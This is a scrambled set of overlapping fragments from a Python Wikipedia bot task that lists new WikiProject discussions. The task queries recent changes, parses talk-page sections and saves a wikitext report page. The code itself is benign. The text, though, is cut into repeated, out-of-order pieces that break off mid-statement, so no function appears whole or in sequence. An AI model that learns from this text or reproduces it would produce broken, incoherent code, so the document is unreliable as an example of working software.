The only pages", "datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell", "OR rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts", "self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns,", "rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts =", "= req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end):", "tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section", "%s pages\", len(titles)) sections = {} chunksize = 50 for start in range(0,", "title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a", "import namedtuple from datetime import datetime import re from reportsbot.task import Task from", "%s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site,", "str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages", "if title in updated: sections[title] = updated[title] elif title in current: sections[title] =", "current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section in", "= self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\")", "timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self,", "= 
current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section", "new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed", "disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold])", "AND (rc_type = 0 OR rc_type = 1 OR rc_type = 3) AND", "page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean =", "if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before", "disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news):", "project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news:", "tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try:", "namedtuple from datetime import datetime import re from reportsbot.task import Task from reportsbot.util", "Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\",", "_load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try:", "DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def", "talk page titles to lists of section tuples. 
The only pages included in", "disclist } summary = \"Updating new discussions\" if news: summary += \": \"", "+ \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current,", "the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req", "discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after =", "project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages,", "within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT", "import re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from", "self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages =", "for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for", "code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name !=", "reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request", "%s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title)", "import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__", "= updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name,", "current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections", "disclist = before + \"<noinclude>\\n\" + after + 
\"</noinclude>\" else: disclist = \"\\n\".join(discitems)", "= \"Updating new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\"", "Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ =", "given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\"", "License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import re", "clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name", "reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section", "= 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages =", "_Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new", "discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M,", "\"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) })", "class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE", "discussions currently listed. 
\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {}", "self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self,", "page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have", "sorted list of the most recent discussion tuples.\"\"\" sections = {} for page", "page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in", "disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if", "list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections =", "section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0))", "disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\",", "pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project,", "len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before +", "= 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the", "talk page titles to lists of section tuples. Given a WikiProject new discussions", "? AND rc_timestamp < ? 
AND rc_namespace % 2 = 1 AND rc_namespace", "page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page", "\"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's", "collections import namedtuple from datetime import datetime import re from reportsbot.task import Task", "page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\":", "pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return", "title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages,", "list of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016", "discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under", "self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist =", "current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news)", "= 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string,", "title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize", "\"\"\"Return a dict mapping talk page titles to lists of section tuples. 
Given", "new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE =", "in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles", "+ after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page =", "cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()]", "{ \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating", "\"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]]", "\"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page))", "WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable", "code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try:", "box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other", "question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }}", "= 0 OR rc_type = 1 OR rc_type = 3) AND rc_bot =", "self._load_pages(chunk) for title, text in pages: try: 
sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed", "scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\"", "= 1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type =", "project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions,", "= self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project,", "for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk", "listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl", "\"\"\"Return a dict mapping talk page titles to lists of section tuples. 
The", "title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title", "[disc.title for disc in discussions if disc.title not in current][:3] return discussions, news", "chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError,", "(rc_type = 0 OR rc_type = 1 OR rc_type = 3) AND rc_bot", "!= self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp", "section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match:", "%B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems)", "= datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects():", "the dict are those that have been updated in the given time range.", "rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between", "from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\"", "query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? 
AND", "discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m", "= \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % {", "disc in discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self,", "2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}}", "title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse", "the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\")", "continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section)", "+ 1, page.title) if title in updated: sections[title] = updated[title] elif title in", "discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title,", "_save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions to the", "= self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\":", "{{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button", "{{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template", "discussions, news) def run(self): start = 
self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start,", "sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from", "= {} chunksize = 50 for start in range(0, len(titles), chunksize): chunk =", "text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\",", "most recent discussion tuples.\"\"\" sections = {} for page in pages: title =", "minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating", "start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title,", "{} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\")", "section tuples. Given a WikiProject new discussions page, return all discussions currently listed.", "a dict mapping talk page titles to lists of section tuples. 
Given a", "in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions:", "2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX", "tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section", "mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s", "for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions", "from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import", "list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\"", "= _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return", "def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new", "in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE]", "rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? 
AND", "OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts =", "data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to", "\"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections = {}", "project, title, discussions, news): \"\"\"Save the given list of discussions to the given", "title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\"", "req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return", "ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load", "section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for", "lists of section tuples. The only pages included in the dict are those", "in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and", "self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated) self._bot.set_last_updated(\"new_discussions\", end)", "the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]):", "__all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\",", "sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def", ">= ? AND rc_timestamp < ? 
AND rc_namespace % 2 = 1 AND", "-*- \"\"\" New Discussions -- Provides a list of new discussions within a", "re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api", "= Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\",", "the given list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div", "a list of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>,", "new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\":", "def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page):", "\"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist =", "section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section}", "summary = \"Updating new discussions\" if news: summary += \": \" + \",", "len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages:", "title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions =", "range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in", "new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members()", "section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in", "return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the", "AND 
rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1 OR", "new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" % item", "= self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for", "self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title", "\"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name)", "1, page.title) if title in updated: sections[title] = updated[title] elif title in current:", "= \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text):", "section tuples. The only pages included in the dict are those that have", "new discussions page, return all discussions currently listed. 
\"\"\" text = self._bot.get_page(title).text code", "last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems", "2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from", "recent discussion tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site,", "item for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new", "re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue", "\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ?", "fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" +", "for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current =", "+ \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title()", "parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk", "given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean", "coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of new discussions", "end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % {", "to lists of section tuples. 
The only pages included in the dict are", "}) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self,", "return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to", "def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions to", "timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the", "for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in", "to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}}", "def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists of", "self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize = 50 for", "discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start", "are those that have been updated in the given time range. 
\"\"\" query", "end): \"\"\"Return a dict mapping talk page titles to lists of section tuples.", "endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with", "a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD =", "section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp,", "DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp", "\"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section", "{} for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if", "pages included in the dict are those that have been updated in the", "(tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue", "not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError:", "run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion", "mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"])", "\"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page", "given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def", "Provides a list of new discussions within a WikiProject's scope Copyright (C) 2015", "discussions.sort(key=lambda disc: 
disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]]", "in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the", "def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to lists", "\"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit()", "rc_timestamp < ? AND rc_namespace % 2 = 1 AND rc_namespace != 3", "@staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\"", "discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime", "sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\",", "req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\":", "if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue", "DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for", "disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at", "for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before =", "\"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data =", "%d %B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if", "\"\"\" template = \"{{WPX new 
discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\":", "= re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError:", "try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value),", "datetime import datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title", "_get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to lists of", "self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp =", "continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp))", "in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in", "current, updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections", "\"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\"", "before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after", "after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else:", "been updated in the given time range. 
